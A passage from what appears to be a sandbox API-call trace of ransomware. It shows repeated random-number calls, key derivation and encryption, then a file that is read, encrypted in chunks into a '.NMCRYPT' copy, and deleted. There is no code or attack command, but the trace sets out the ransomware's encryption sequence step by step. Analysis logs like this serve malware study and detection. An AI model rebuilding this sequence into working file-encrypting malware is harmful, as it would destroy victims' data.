hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.060] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.061] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.061] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.061] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.061] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.061] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.061] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.061] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.061] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.061] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.061] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.061] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.061] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.061] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.061] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.061] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.061] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.061] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.061] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.061] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.061] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.061] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.061] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.061] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.061] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.061] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.061] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.061] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.061] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.061] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.061] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.061] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.061] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.061] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.061] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.061] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.061] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.061] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.061] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.061] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.061] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.061] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.061] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.061] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.061] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.061] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.061] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.061] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.061] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.061] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.061] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.062] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.062] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.062] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.062] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.062] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.062] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.062] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.062] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.062] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.062] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.062] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.062] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.062] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.062] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.062] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.062] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.062] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.062] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.062] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.062] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.062] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.062] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.062] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.062] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.062] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.062] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.062] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.062] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.062] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.062] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.062] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.062] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.062] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.062] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.062] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.062] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.062] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.062] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.062] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.062] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.062] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.062] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.062] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.062] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.062] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.062] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.062] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.062] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.062] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.062] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.062] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.062] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.063] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.063] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.063] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.063] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.063] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.063] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.063] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.063] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.063] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.063] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.063] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.063] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0164.063] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0164.063] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0164.063] CryptCreateHash (in: hProv=0x8e3088, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4448cc | out: phHash=0x1d4448cc) returned 1 [0164.063] CryptHashData (hHash=0x9ad678, pbData=0x2d7e6d0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0164.063] CryptDeriveKey (in: hProv=0x8e3088, Algid=0x6610, hBaseData=0x9ad678, dwFlags=0x4, phKey=0x1d4448d0 | out: phKey=0x1d4448d0*=0x9ad7f8) returned 1 [0164.064] CryptSetKeyParam (hKey=0x9ad7f8, dwParam=0x1, pbData=0x2d7e7d0, dwFlags=0x0) returned 1 [0164.064] CryptSetKeyParam (hKey=0x9ad7f8, dwParam=0x4, pbData=0x2d7e680*=0x1, dwFlags=0x0) returned 1 [0164.064] wcslen (_String="\\\\?\\") returned 0x4 [0164.064] CryptDuplicateKey (in: hKey=0x9ad7f8, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7e654 | out: phKey=0x2d7e654*=0x9ad538) returned 1 [0164.064] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Monet.jpg.NMCRYPT" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\monet.jpg.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x588 [0164.064] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Monet.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\monet.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1624 [0164.064] GetFileSizeEx (in: hFile=0x1624, lpFileSize=0x2d7e644 | out: lpFileSize=0x2d7e644*=2209) returned 1 [0164.064] WriteFile (in: hFile=0x588, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7e63c*=0x200, lpOverlapped=0x0) returned 1 [0164.065] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.066] CryptEncrypt (in: hKey=0x9ad538, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.066] GetLastError () returned 0x0 [0164.066] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.067] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.067] CryptEncrypt (in: hKey=0x9ad538, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.067] GetLastError () returned 0x0 [0164.067] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.067] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.067] CryptEncrypt (in: hKey=0x9ad538, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.067] GetLastError () returned 0x0 [0164.067] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.067] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.067] CryptEncrypt (in: hKey=0x9ad538, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.067] GetLastError () returned 0x0 [0164.067] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.067] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.067] CryptEncrypt (in: hKey=0x9ad538, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.067] GetLastError () returned 0x0 [0164.067] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.067] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.067] CryptEncrypt (in: hKey=0x9ad538, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.067] GetLastError () returned 0x0 [0164.067] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.067] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.067] CryptEncrypt (in: hKey=0x9ad538, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.067] GetLastError () returned 0x0 [0164.068] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.068] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.068] CryptEncrypt (in: hKey=0x9ad538, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.068] GetLastError () returned 0x0 [0164.068] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.068] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0xa1, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0xa1, lpOverlapped=0x0) returned 1 [0164.068] CryptEncrypt (in: hKey=0x9ad538, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0xa1, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0xb0) returned 1 [0164.068] GetLastError () returned 0x0 [0164.068] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0xb0, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0xb0, lpOverlapped=0x0) returned 1 [0164.068] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x0, lpOverlapped=0x0) returned 1 [0164.068] WriteFile (in: hFile=0x588, lpBuffer=0x2895990*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesWritten=0x2d7e63c*=0x0, lpOverlapped=0x0) returned 1 [0164.068] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Monet.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\monet.jpg")) returned 0x20 [0164.068] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Monet.jpg", dwFileAttributes=0x20) returned 0 [0164.068] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Monet.jpg") returned 1 [0164.068] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Monet.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\monet.jpg")) returned 0 [0164.069] wcscpy (in: _Dest=0x2d7e194, 